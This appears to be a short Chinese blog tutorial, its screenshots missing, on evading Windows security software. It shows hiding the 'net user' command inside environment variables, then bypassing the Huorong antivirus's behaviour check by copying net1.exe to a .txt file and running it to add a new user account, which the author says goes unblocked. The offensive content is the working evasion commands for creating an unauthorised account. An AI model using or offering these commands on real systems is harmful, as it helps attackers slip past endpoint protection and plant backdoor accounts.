1.常规套路

1)利用环境变量执行命令

set a=123
image.png
执行net user命令

  1. set a=net
  2. set b=user
  3. %a% %b%

image.png

2.绕过火绒的行为检查(bypass 火绒)

需要管理员权限(顺带说一句,管理权限在进程里面干不掉火绒的进程)
正常的执行——肯定拦截的嘛
image.png
绕过方式:使用net1.exe ,这个也是系统自带的
image.png
绕过如下:
**copy net1.exe xx.txt && xx.txt user 33 33 /add**
image.png
此时火绒不会拦截